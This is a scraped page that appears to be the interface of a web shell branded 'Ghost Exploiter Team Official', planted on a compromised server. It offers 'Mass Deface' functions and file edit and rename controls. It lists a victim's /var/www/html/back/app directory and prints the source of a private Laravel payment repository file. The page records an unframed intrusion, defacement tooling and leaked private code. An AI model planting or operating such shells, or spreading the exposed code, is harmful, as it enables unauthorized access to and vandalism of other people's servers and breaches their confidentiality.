Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Repositories
/
ProjectGroup
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Interfaces
--
ren
OpenApiPaginatedRespons
...
0KB
edt
ren
PaginationDto.php
0KB
edt
ren
PaymentByArticleReposit
...
0.995KB
edt
ren
ResponseDto.php
0KB
edt
ren
TokenResponse.php
0KB
edt
ren
<?php namespace App\Repositories\ProjectGroup; use App\Domain\Payment\Enums\PaymentStatusEnum; use App\Domain\Payment\Enums\PaymentTypeEnum; use App\Models\Article; use App\Models\PaymentDistribution; use App\Models\Project; use App\Repositories\CashFlowIndex\Interfaces\PaymentDistributionsRepositoryInterface; use App\Repositories\ProjectGroup\Interfaces\PaymentByArticleRepositoryInterface; use Carbon\Carbon; use Illuminate\Support\Collection; use Illuminate\Support\Facades\Log; class PaymentByArticleRepository implements PaymentByArticleRepositoryInterface { public function getProjectIds($modelId, $projectGroupId) { return Project::query() ->where(['model_id' => $modelId, 'project_group_id' => $projectGroupId]) ->pluck('id')->toArray(); } public function getArticleIds($projectIds) { return PaymentDistribution::query() ->whereIn('project_id', $projectIds) ->pluck('article_id')->unique()->values()->toArray(); } }
<=Back
Liking